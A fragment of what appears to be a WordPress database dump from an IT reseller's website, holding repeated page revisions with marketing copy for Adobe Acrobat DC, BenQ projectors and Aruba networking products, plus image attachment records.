release of Acrobat DC. You will never need to upgrade your product as long as you keep your subscription current.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div>\r\n<div class=\"text-padding-t3x dc-text\">[maxbutton id=\"1\" ]</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\"></div>\r\n</div>\r\n</div>\r\n&nbsp;','Adobe','','inherit','closed','closed','','1436-revision-v1','','','2018-12-11 16:21:44','2018-12-11 08:21:44','',1436,'https://bintara.com.my/blog/2018/12/11/1436-revision-v1/',0,'revision','',0),(1627,1,'2018-12-11 15:57:08','2018-12-11 07:57:08','','StorageCraft','','inherit','closed','closed','','1599-revision-v1','','','2018-12-11 15:57:08','2018-12-11 07:57:08','',1599,'https://bintara.com.my/blog/2018/12/11/1599-revision-v1/',0,'revision','',0),(1628,1,'2018-12-11 15:57:24','2018-12-11 07:57:24','','TeamViewer','','inherit','closed','closed','','1605-revision-v1','','','2018-12-11 15:57:24','2018-12-11 07:57:24','',1605,'https://bintara.com.my/blog/2018/12/11/1605-revision-v1/',0,'revision','',0),(1640,1,'2018-12-11 16:08:52','2018-12-11 08:08:52','<img class=\"wp-image-1603 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/adobe.png\" alt=\"\" width=\"280\" height=\"273\" />\r\n\r\nAdobe Acrobat DC is the latest version of Acrobat subscription software.Â It\'s the most mobile, productive and collaborative PDF solution Adobe offers, combining Acrobat desktop software and the mobile scan app, the signature app and Acrobat Reader mobile app â€” enhanced with premium mobile features and premium Document Cloud services.\r\n\r\nAcrobat 2017 desktop software is available as a one-time purchase. It does not include quarterly Acrobat feature enhancements or access to premium Adobe Document Cloud services like Adobe Sign via your web browser and mobile devices.\r\n\r\nMany Acrobat DC tools and utilities are available to streamline enterprise deployments and help control IT costs.\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div class=\"text-padding-t3x dc-text\">\r\n<div class=\"text-3-block\"><span class=\"text-light\">The subscription to Acrobat DC includes the following:</span></div>\r\n<ul>\r\n 	<li class=\"text-3-block\"><span class=\"text-light\">Acrobat Pro or Acrobat Standard desktop software â€” including future feature updates, quarterly security enhancements and improvements.</span></li>\r\n 	<li class=\"text-3-block\">Adobe Document Cloud services, which let you complete essential PDF tasks with the Acrobat Reader mobile appÂ or in your web browser, including storing and sharing files online. Document Cloud services also enable complete workflows for sending, e-signing, and tracking documents.</li>\r\n 	<li class=\"text-3-block\">Adobe Sign subscriptionÂ â€” a swipe-and-tap solution to collect and sign legal electronic and digital signatures on any device.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\">When you subscribe to Acrobat Pro DC or Acrobat Standard DC, you pay a monthly or annual fee based on the plan you choose. And your product is always the most current release of Acrobat DC. You will never need to upgrade your product as long as you keep your subscription current.</div>\r\n<div></div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div>\r\n<div class=\"text-padding-t3x dc-text\">[maxbutton id=\"1\" ]</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\"></div>\r\n</div>\r\n</div>\r\n&nbsp;','Adobe','','inherit','closed','closed','','1436-revision-v1','','','2018-12-11 16:08:52','2018-12-11 08:08:52','',1436,'https://bintara.com.my/blog/2018/12/11/1436-revision-v1/',0,'revision','',0),(1629,1,'2018-12-11 15:59:11','2018-12-11 07:59:11','<img class=\"wp-image-1603 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/adobe.png\" alt=\"\" width=\"280\" height=\"273\" />\r\n\r\nAdobe Acrobat DC is the latest version of Acrobat subscription software.Â It\'s the most mobile, productive and collaborative PDF solution Adobe offers, combining Acrobat desktop software and the mobile scan app, the signature app and Acrobat Reader mobile app â€” enhanced with premium mobile features and premium Document Cloud services.\r\n\r\nAcrobat 2017 desktop software is available as a one-time purchase. It does not include quarterly Acrobat feature enhancements or access to premium Adobe Document Cloud services like Adobe Sign via your web browser and mobile devices.\r\n\r\nMany Acrobat DC tools and utilities are available to streamline enterprise deployments and help control IT costs.\r\n<div>\r\n<div class=\"text-padding-t10x  dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div class=\"text-padding-t3x dc-text\">\r\n<div class=\"text-3-block\"><span class=\"text-light\">The subscription to Acrobat DC includes the following:</span></div>\r\n<ul>\r\n 	<li class=\"text-3-block\"><span class=\"text-light\">Acrobat Pro or Acrobat Standard desktop software â€” including future feature updates, quarterly security enhancements and improvements.</span></li>\r\n 	<li class=\"text-3-block\">Adobe Document Cloud services, which let you complete essential PDF tasks with the Acrobat Reader mobile appÂ or in your web browser, including storing and sharing files online. Document Cloud services also enable complete workflows for sending, e-signing, and tracking documents.</li>\r\n 	<li class=\"text-3-block\">Adobe Sign subscriptionÂ â€” a swipe-and-tap solution to collect and sign legal electronic and digital signatures on any device.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x  dc-collapse\">\r\n<div class=\"dc-collapse-header\">When you subscribe to Acrobat Pro DC or Acrobat Standard DC, you pay a monthly or annual fee based on the plan you choose. And your product is always the most current release of Acrobat DC. You will never need to upgrade your product as long as you keep your subscription current.</div>\r\n<div></div>\r\n</div>\r\n</div>\r\nAn Individual subscription is a single license meant for use by one user. A Team subscription allows a business to purchase more than one license and manage those license(s) among users in an admin console.\r\n<div>\r\n<div class=\"text-padding-t10x  dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div>\r\n<div class=\"text-padding-t3x dc-text\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x  dc-collapse\">\r\n<div class=\"dc-collapse-header\"></div>\r\n</div>\r\n</div>\r\n&nbsp;','Adobe','','inherit','closed','closed','','1436-revision-v1','','','2018-12-11 15:59:11','2018-12-11 07:59:11','',1436,'https://bintara.com.my/blog/2018/12/11/1436-revision-v1/',0,'revision','',0),(1641,1,'2018-12-11 16:09:19','2018-12-11 08:09:19','<img class=\"wp-image-1603 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/adobe.png\" alt=\"\" width=\"280\" height=\"273\" />\r\n\r\nAdobe Acrobat DC is the latest version of Acrobat subscription software.Â It\'s the most mobile, productive and collaborative PDF solution Adobe offers, combining Acrobat desktop software and the mobile scan app, the signature app and Acrobat Reader mobile app â€” enhanced with premium mobile features and premium Document Cloud services.\r\n\r\nAcrobat 2017 desktop software is available as a one-time purchase. It does not include quarterly Acrobat feature enhancements or access to premium Adobe Document Cloud services like Adobe Sign via your web browser and mobile devices.\r\n\r\nMany Acrobat DC tools and utilities are available to streamline enterprise deployments and help control IT costs.\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div class=\"text-padding-t3x dc-text\">\r\n<div class=\"text-3-block\"><span class=\"text-light\">The subscription to Acrobat DC includes the following:</span></div>\r\n<ul>\r\n 	<li class=\"text-3-block\"><span class=\"text-light\">Acrobat Pro or Acrobat Standard desktop software â€” including future feature updates, quarterly security enhancements and improvements.</span></li>\r\n 	<li class=\"text-3-block\">Adobe Document Cloud services, which let you complete essential PDF tasks with the Acrobat Reader mobile appÂ or in your web browser, including storing and sharing files online. Document Cloud services also enable complete workflows for sending, e-signing, and tracking documents.</li>\r\n 	<li class=\"text-3-block\">Adobe Sign subscriptionÂ â€” a swipe-and-tap solution to collect and sign legal electronic and digital signatures on any device.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\">When you subscribe to Acrobat Pro DC or Acrobat Standard DC, you pay a monthly or annual fee based on the plan you choose. And your product is always the most current release of Acrobat DC. You will never need to upgrade your product as long as you keep your subscription current.</div>\r\n</div>\r\n<div></div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div>\r\n<div class=\"text-padding-t3x dc-text\">[maxbutton id=\"1\" ]</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\"></div>\r\n</div>\r\n</div>\r\n&nbsp;','Adobe','','inherit','closed','closed','','1436-revision-v1','','','2018-12-11 16:09:19','2018-12-11 08:09:19','',1436,'https://bintara.com.my/blog/2018/12/11/1436-revision-v1/',0,'revision','',0),(1642,1,'2018-12-11 16:10:10','2018-12-11 08:10:10','<img class=\"wp-image-1603 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/adobe.png\" alt=\"\" width=\"280\" height=\"273\" />\r\n\r\nAdobe Acrobat DC is the latest version of Acrobat subscription software.Â It\'s the most mobile, productive and collaborative PDF solution Adobe offers, combining Acrobat desktop software and the mobile scan app, the signature app and Acrobat Reader mobile app â€” enhanced with premium mobile features and premium Document Cloud services.\r\n\r\nAcrobat 2017 desktop software is available as a one-time purchase. It does not include quarterly Acrobat feature enhancements or access to premium Adobe Document Cloud services like Adobe Sign via your web browser and mobile devices.\r\n\r\nMany Acrobat DC tools and utilities are available to streamline enterprise deployments and help control IT costs.\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div class=\"text-padding-t3x dc-text\">\r\n<div class=\"text-3-block\"><span class=\"text-light\">The subscription to Acrobat DC includes the following:</span></div>\r\n<ul>\r\n 	<li class=\"text-3-block\"><span class=\"text-light\">Acrobat Pro or Acrobat Standard desktop software â€” including future feature updates, quarterly security enhancements and improvements.</span></li>\r\n 	<li class=\"text-3-block\">Adobe Document Cloud services, which let you complete essential PDF tasks with the Acrobat Reader mobile appÂ or in your web browser, including storing and sharing files online. Document Cloud services also enable complete workflows for sending, e-signing, and tracking documents.</li>\r\n 	<li class=\"text-3-block\">Adobe Sign subscriptionÂ â€” a swipe-and-tap solution to collect and sign legal electronic and digital signatures on any device.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\">When you subscribe to Acrobat Pro DC or Acrobat Standard DC, you pay a monthly or annual fee based on the plan you choose. And your product is always the most current release of Acrobat DC. You will never need to upgrade your product as long as you keep your subscription current.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div>\r\n<div class=\"text-padding-t3x dc-text\">[maxbutton id=\"1\" ]</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\"></div>\r\n</div>\r\n</div>\r\n&nbsp;','Adobe','','inherit','closed','closed','','1436-revision-v1','','','2018-12-11 16:10:10','2018-12-11 08:10:10','',1436,'https://bintara.com.my/blog/2018/12/11/1436-revision-v1/',0,'revision','',0),(1645,1,'2018-12-11 16:27:32','2018-12-11 08:27:32','<img class=\"wp-image-1603 aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/adobe.png\" alt=\"\" width=\"280\" height=\"273\" />\r\n\r\nAdobe Acrobat DC is the latest version of Acrobat subscription software.Â It\'s the most mobile, productive and collaborative PDF solution Adobe offers, combining Acrobat desktop software, mobile scan app, signature app and Acrobat Reader mobile app â€” enhanced with premium mobile features and premium Document Cloud services.\r\n\r\nAcrobat 2017 desktop software is available as a one-time purchase. It does not include quarterly Acrobat feature enhancements or access to premium Adobe Document Cloud services like Adobe Sign via your web browser and mobile devices.\r\n\r\nMany Acrobat DC tools and utilities are available to streamline enterprise deployments and help control IT costs.\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div class=\"text-padding-t3x dc-text\">\r\n<div class=\"text-3-block\"><span class=\"text-light\">The subscription to Acrobat DC includes the following:</span></div>\r\n<ul>\r\n 	<li class=\"text-3-block\"><span class=\"text-light\">Acrobat Pro or Acrobat Standard desktop software â€” including future feature updates, quarterly security enhancements &amp; improvements.</span></li>\r\n 	<li class=\"text-3-block\">Adobe Document Cloud servicesÂ <span class=\"text-light\">â€”</span> complete essential PDF tasks with the Acrobat Reader mobile appÂ or in web browser, including storing &amp; sharing files online. Document Cloud services also enable complete workflows for sending, e-signing, and tracking documents.</li>\r\n 	<li class=\"text-3-block\">Adobe Sign subscriptionÂ â€” a swipe-and-tap solution to collect, sign legal electronic and digital signatures on any device.</li>\r\n</ul>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\">When you subscribe Acrobat Pro DC or Acrobat Standard DC, you pay a monthly or annual fee based on the plan you choose. And your product is always the most current release of Acrobat DC. You will never need to upgrade your product as long as you keep your subscription current.</div>\r\n</div>\r\n</div>\r\n<div></div>\r\n<div></div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse active\">\r\n<div class=\"dc-collapse-body\">\r\n<div>\r\n<div class=\"text-padding-t3x dc-text\">[maxbutton id=\"1\" ]</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div>\r\n<div class=\"text-padding-t10x dc-collapse\">\r\n<div class=\"dc-collapse-header\"></div>\r\n</div>\r\n</div>\r\n&nbsp;','Adobe','','inherit','closed','closed','','1436-revision-v1','','','2018-12-11 16:27:32','2018-12-11 08:27:32','',1436,'https://bintara.com.my/blog/2018/12/11/1436-revision-v1/',0,'revision','',0),(1646,1,'2018-12-11 16:28:25','2018-12-11 08:28:25','','networking-overview_1_AP330_580x320','','inherit','closed','closed','','networking-overview_1_ap330_580x320','','','2018-12-11 16:28:25','2018-12-11 08:28:25','',1440,'https://bintara.com.my/wp-content/uploads/2018/12/networking-overview_1_AP330_580x320.jpg',0,'attachment','image/jpeg',0),(1648,1,'2018-12-11 16:29:52','2018-12-11 08:29:52','','Networking_Overview_Page_Module_2_580x320','','inherit','closed','closed','','networking_overview_page_module_2_580x320','','','2018-12-11 16:29:52','2018-12-11 08:29:52','',1440,'https://bintara.com.my/wp-content/uploads/2018/12/Networking_Overview_Page_Module_2_580x320.jpg',0,'attachment','image/jpeg',0),(2120,1,'2018-12-14 09:08:46','2018-12-14 01:08:46','<h3>BenQ</h3>\r\n<h3><u>Projectors</u></h3>\r\n<h3>Business Projector (Smart Design for Presentations)</h3>\r\n<h4>High Brightness for Well-Lit Rooms</h4>\r\nIdeal for lights-on presentations in bright meeting rooms, BenQ business projectors produce high brightness for effective teamwork, collaboration, and note-taking. The high-lumen output ensures brilliant picture quality with vibrant colors as well as crisp text.\r\n<h3>Interactive Classroom Projectors</h3>\r\n<h4>Enhanced Learning with Smart Interactivity for Tomorrow\'s Classrooms</h4>\r\nFutureproof BenQ Interactive Classroom Projectors empower collaborative learning with pen or touch annotation and short / ultra-short throw projection based on brilliant laser or lamp light sources.\r\n<ul>\r\n 	<li>Industry-Leading Dustproof Design: BenQ Dust Guard<sup>TM</sup></li>\r\n 	<li>High Brightness from 3000-3500 ANSI Lumens</li>\r\n 	<li>High resolution with (Ultra) Short Throw</li>\r\n 	<li>Scalable for Wireless Use and Interactivity</li>\r\n</ul>\r\n<h3><u>Interactive Flat Panel</u></h3>\r\n<h4>Meeting Room &amp; Boardroom</h4>\r\nDigital displays help businesses improve meetings by presenting pertinent information through presentations, documents, images and more. BenQ has a variety of digital display solutions such as High Brightness Business Projectors and Interactive Flat Panels, all of which have been created for ease of use, and to increase efficiency and boost participation for office environments.\r\n<h4>4K UHD 84\'\' Corporate Interactive Flat Panel Display | RP840G</h4>\r\n<strong>Work Collaboratively and Conduct Business Efficiently</strong>\r\nThe RP840G is a modern enterpriseâ€™s one-stop display solution for picture-perfect 4K presentation, seamless communication and real-time collaboration.With the built-in EZWrite annotation app, employees can instantly open a wide range of documents and directly mark on the screen for efficient idea sharing.\r\n\r\nWhether for brainstorming sessions or year-end financial meetings, the RP840G works smoothly with BenQâ€™s wireless presentation solution and allows employees to stream content from laptops or smart devices within seconds.\r\n\r\nFeaturing an open-platform design, the RP840G also offers unrivaled compatibility that lets employees work and discuss with the devices or software they prefer. And to encourage workplace health, the panel is built with proprietary eye-care technology so employees can focus on their jobs without suffering from eye fatigue.\r\n<h4>How BenQ Display turns meeting rooms into places of efficiency</h4>\r\n<ul>\r\n 	<li>Present content wirelessly and instantly withÂ InstaShow<sup>TM</sup>, a hardware that requires no software and allows up to 16 participants to connect notebooks and take over instantly</li>\r\n 	<li>Display stunningly bright, crystal clear images with reliable, flexibleÂ Business ProjectorsÂ that capture staff attention, while simultaneously streamlining company meetings</li>\r\n 	<li>With Big Zoom and Lens Shift capability, flexible installation and easy calibration is possible onÂ Business Projectors,Â even in large boardrooms</li>\r\n 	<li>With BenQâ€™sÂ Smart DisplayÂ plus InstaQShare app pre-installed in your PC, smartphone and tablet, all presentations can go wirelessly.</li>\r\n</ul>\r\n[maxbutton id=\"1\" ]','BenQ','','inherit','closed','closed','','1447-revision-v1','','','2018-12-14 09:08:46','2018-12-14 01:08:46','',1447,'https://bintara.com.my/blog/2018/12/14/1447-revision-v1/',0,'revision','',0),(1649,1,'2018-12-11 16:31:17','2018-12-11 08:31:17','','SD_Launch-SD-WAN_Page_Module_3_580x320','','inherit','closed','closed','','sd_launch-sd-wan_page_module_3_580x320','','','2018-12-11 16:31:17','2018-12-11 08:31:17','',1440,'https://bintara.com.my/wp-content/uploads/2018/12/SD_Launch-SD-WAN_Page_Module_3_580x320.jpg',0,'attachment','image/jpeg',0),(1650,1,'2018-12-11 16:36:09','2018-12-11 08:36:09','','security-analytics_module-5_580x320','','inherit','closed','closed','','security-analytics_module-5_580x320','','','2018-12-11 16:36:09','2018-12-11 08:36:09','',1440,'https://bintara.com.my/wp-content/uploads/2018/12/security-analytics_module-5_580x320.jpg',0,'attachment','image/jpeg',0),(1651,1,'2018-12-11 16:37:39','2018-12-11 08:37:39','','networking-overview-module5_580x320','','inherit','closed','closed','','networking-overview-module5_580x320','','','2018-12-11 16:37:39','2018-12-11 08:37:39','',1440,'https://bintara.com.my/wp-content/uploads/2018/12/networking-overview-module5_580x320.jpg',0,'attachment','image/jpeg',0),(1652,1,'2018-12-11 16:40:33','2018-12-11 08:40:33','<h1>NETWORKING PRODUCTS</h1>\r\n<div class=\"subheadline\">\r\n<h2>Smarter solutions for experience-driven networking.</h2>\r\n<h2>Wireless access you can always count on.</h2>\r\n<img class=\"wp-image-1646 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview_1_AP330_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\nAruba wireless solutions deliver the flexibility and high performance to meet the needs of any midsize business or high-density enterprise. With built-in AI-intelligence, location services, and seamless roaming users and IT receive an optimal experience. With flexible and high-performance wireless, Aruba meets the need of any midsize or high-density enterprise.\r\n\r\n<img class=\"wp-image-1648 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Networking_Overview_Page_Module_2_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Wired networking thatâ€™s a whole lot smarter.</h2>\r\nYou need performance and scale for todayâ€™s cloud-based applications and bandwidth hungry devices. Arubaâ€™s next generation access and aggregation switches provide the high-speed infrastructure and backbone for moving traffic intelligently from the edge to the core.\r\n\r\n<img class=\"wp-image-1649 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SD_Launch-SD-WAN_Page_Module_3_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n</div>\r\n<h2>Visibility and control for your WAN.</h2>\r\nArubaâ€™s software-defined WAN (SD-WAN) solution provides WAN routing that is simple to deploy and manage â€“ and saves time and money. Itâ€™s ideal for distributed enterprises wanting to transition to a more agile, open and cloud-hosted environment.\r\n\r\n<img class=\"wp-image-1650 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/security-analytics_module-5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Protect your organization, from inside and out.</h2>\r\nWith 360 degrees of active cyber protection, Aruba ClearPass and IntroSpect provide the visibility and network access control needed for todayâ€™s digital workplace. Automated policies and machine learning-based analytics detect threats on the inside while accelerating investigations and response.\r\n\r\n<img class=\"wp-image-1651 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview-module5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Centralized network operations.</h2>\r\nGet granular visibility into users, devices, and apps running on your WLAN, LAN, and SD-WAN to deliver the performance and reliability your business demands. Simplify your operations with Arubaâ€™s easy-to-use and powerful on premise or cloud-based network management solutions.','Aruba','','inherit','closed','closed','','1440-revision-v1','','','2018-12-11 16:40:33','2018-12-11 08:40:33','',1440,'https://bintara.com.my/blog/2018/12/11/1440-revision-v1/',0,'revision','',0),(1653,1,'2018-12-11 16:40:53','2018-12-11 08:40:53','<h1>NETWORKING PRODUCTS</h1>\r\n&nbsp;\r\n<div class=\"subheadline\">\r\n<h2>Smarter solutions for experience-driven networking.</h2>\r\n&nbsp;\r\n<h2>Wireless access you can always count on.</h2>\r\n<img class=\"wp-image-1646 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview_1_AP330_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\nAruba wireless solutions deliver the flexibility and high performance to meet the needs of any midsize business or high-density enterprise. With built-in AI-intelligence, location services, and seamless roaming users and IT receive an optimal experience. With flexible and high-performance wireless, Aruba meets the need of any midsize or high-density enterprise.\r\n\r\n<img class=\"wp-image-1648 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Networking_Overview_Page_Module_2_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Wired networking thatâ€™s a whole lot smarter.</h2>\r\nYou need performance and scale for todayâ€™s cloud-based applications and bandwidth hungry devices. Arubaâ€™s next generation access and aggregation switches provide the high-speed infrastructure and backbone for moving traffic intelligently from the edge to the core.\r\n\r\n<img class=\"wp-image-1649 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SD_Launch-SD-WAN_Page_Module_3_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n</div>\r\n<h2>Visibility and control for your WAN.</h2>\r\nArubaâ€™s software-defined WAN (SD-WAN) solution provides WAN routing that is simple to deploy and manage â€“ and saves time and money. Itâ€™s ideal for distributed enterprises wanting to transition to a more agile, open and cloud-hosted environment.\r\n\r\n<img class=\"wp-image-1650 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/security-analytics_module-5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Protect your organization, from inside and out.</h2>\r\nWith 360 degrees of active cyber protection, Aruba ClearPass and IntroSpect provide the visibility and network access control needed for todayâ€™s digital workplace. Automated policies and machine learning-based analytics detect threats on the inside while accelerating investigations and response.\r\n\r\n<img class=\"wp-image-1651 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview-module5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Centralized network operations.</h2>\r\nGet granular visibility into users, devices, and apps running on your WLAN, LAN, and SD-WAN to deliver the performance and reliability your business demands. Simplify your operations with Arubaâ€™s easy-to-use and powerful on premise or cloud-based network management solutions.','Aruba','','inherit','closed','closed','','1440-revision-v1','','','2018-12-11 16:40:53','2018-12-11 08:40:53','',1440,'https://bintara.com.my/blog/2018/12/11/1440-revision-v1/',0,'revision','',0),(1654,1,'2018-12-11 16:41:27','2018-12-11 08:41:27','<h1>NETWORKING PRODUCTS</h1>\r\n&nbsp;\r\n<div class=\"subheadline\">\r\n<h2>Smarter solutions for experience-driven networking.</h2>\r\n&nbsp;\r\n\r\n<img class=\"wp-image-1646 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview_1_AP330_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Wireless access you can always count on.</h2>\r\nAruba wireless solutions deliver the flexibility and high performance to meet the needs of any midsize business or high-density enterprise. With built-in AI-intelligence, location services, and seamless roaming users and IT receive an optimal experience. With flexible and high-performance wireless, Aruba meets the need of any midsize or high-density enterprise.\r\n\r\n<img class=\"wp-image-1648 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Networking_Overview_Page_Module_2_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Wired networking thatâ€™s a whole lot smarter.</h2>\r\nYou need performance and scale for todayâ€™s cloud-based applications and bandwidth hungry devices. Arubaâ€™s next generation access and aggregation switches provide the high-speed infrastructure and backbone for moving traffic intelligently from the edge to the core.\r\n\r\n<img class=\"wp-image-1649 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SD_Launch-SD-WAN_Page_Module_3_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n</div>\r\n<h2>Visibility and control for your WAN.</h2>\r\nArubaâ€™s software-defined WAN (SD-WAN) solution provides WAN routing that is simple to deploy and manage â€“ and saves time and money. Itâ€™s ideal for distributed enterprises wanting to transition to a more agile, open and cloud-hosted environment.\r\n\r\n<img class=\"wp-image-1650 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/security-analytics_module-5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Protect your organization, from inside and out.</h2>\r\nWith 360 degrees of active cyber protection, Aruba ClearPass and IntroSpect provide the visibility and network access control needed for todayâ€™s digital workplace. Automated policies and machine learning-based analytics detect threats on the inside while accelerating investigations and response.\r\n\r\n<img class=\"wp-image-1651 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview-module5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Centralized network operations.</h2>\r\nGet granular visibility into users, devices, and apps running on your WLAN, LAN, and SD-WAN to deliver the performance and reliability your business demands. Simplify your operations with Arubaâ€™s easy-to-use and powerful on premise or cloud-based network management solutions.','Aruba','','inherit','closed','closed','','1440-revision-v1','','','2018-12-11 16:41:27','2018-12-11 08:41:27','',1440,'https://bintara.com.my/blog/2018/12/11/1440-revision-v1/',0,'revision','',0),(1655,1,'2018-12-11 16:42:30','2018-12-11 08:42:30','','netinsight-resolve-issues','','inherit','closed','closed','','netinsight-resolve-issues','','','2018-12-11 16:42:30','2018-12-11 08:42:30','',1440,'https://bintara.com.my/wp-content/uploads/2018/12/netinsight-resolve-issues.jpg',0,'attachment','image/jpeg',0),(1656,1,'2018-12-11 16:43:06','2018-12-11 08:43:06','<h1>NETWORKING PRODUCTS</h1>\r\n&nbsp;\r\n<div class=\"subheadline\">\r\n<h2>Smarter solutions for experience-driven networking.</h2>\r\n&nbsp;\r\n\r\n<img class=\"wp-image-1646 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/networking-overview_1_AP330_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Wireless access you can always count on.</h2>\r\nAruba wireless solutions deliver the flexibility and high performance to meet the needs of any midsize business or high-density enterprise. With built-in AI-intelligence, location services, and seamless roaming users and IT receive an optimal experience. With flexible and high-performance wireless, Aruba meets the need of any midsize or high-density enterprise.\r\n\r\n<img class=\"wp-image-1648 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/Networking_Overview_Page_Module_2_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Wired networking thatâ€™s a whole lot smarter.</h2>\r\nYou need performance and scale for todayâ€™s cloud-based applications and bandwidth hungry devices. Arubaâ€™s next generation access and aggregation switches provide the high-speed infrastructure and backbone for moving traffic intelligently from the edge to the core.\r\n\r\n<img class=\"wp-image-1649 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/SD_Launch-SD-WAN_Page_Module_3_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n\r\n</div>\r\n<h2>Visibility and control for your WAN.</h2>\r\nArubaâ€™s software-defined WAN (SD-WAN) solution provides WAN routing that is simple to deploy and manage â€“ and saves time and money. Itâ€™s ideal for distributed enterprises wanting to transition to a more agile, open and cloud-hosted environment.\r\n\r\n<img class=\"wp-image-1650 size-medium aligncenter\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/security-analytics_module-5_580x320-300x166.jpg\" alt=\"\" width=\"300\" height=\"166\" />\r\n<h2>Protect your organization, from inside and out.</h2>\r\nWith 360 degrees of active cyber protection, Aruba ClearPass and IntroSpect provide the visibility and network access control needed for todayâ€™s digital workplace. Automated policies and machine learning-based analytics detect threats on the inside while accelerating investigations and response.\r\n\r\n<img class=\"wp-image-1651 size-medium aligncenter\" 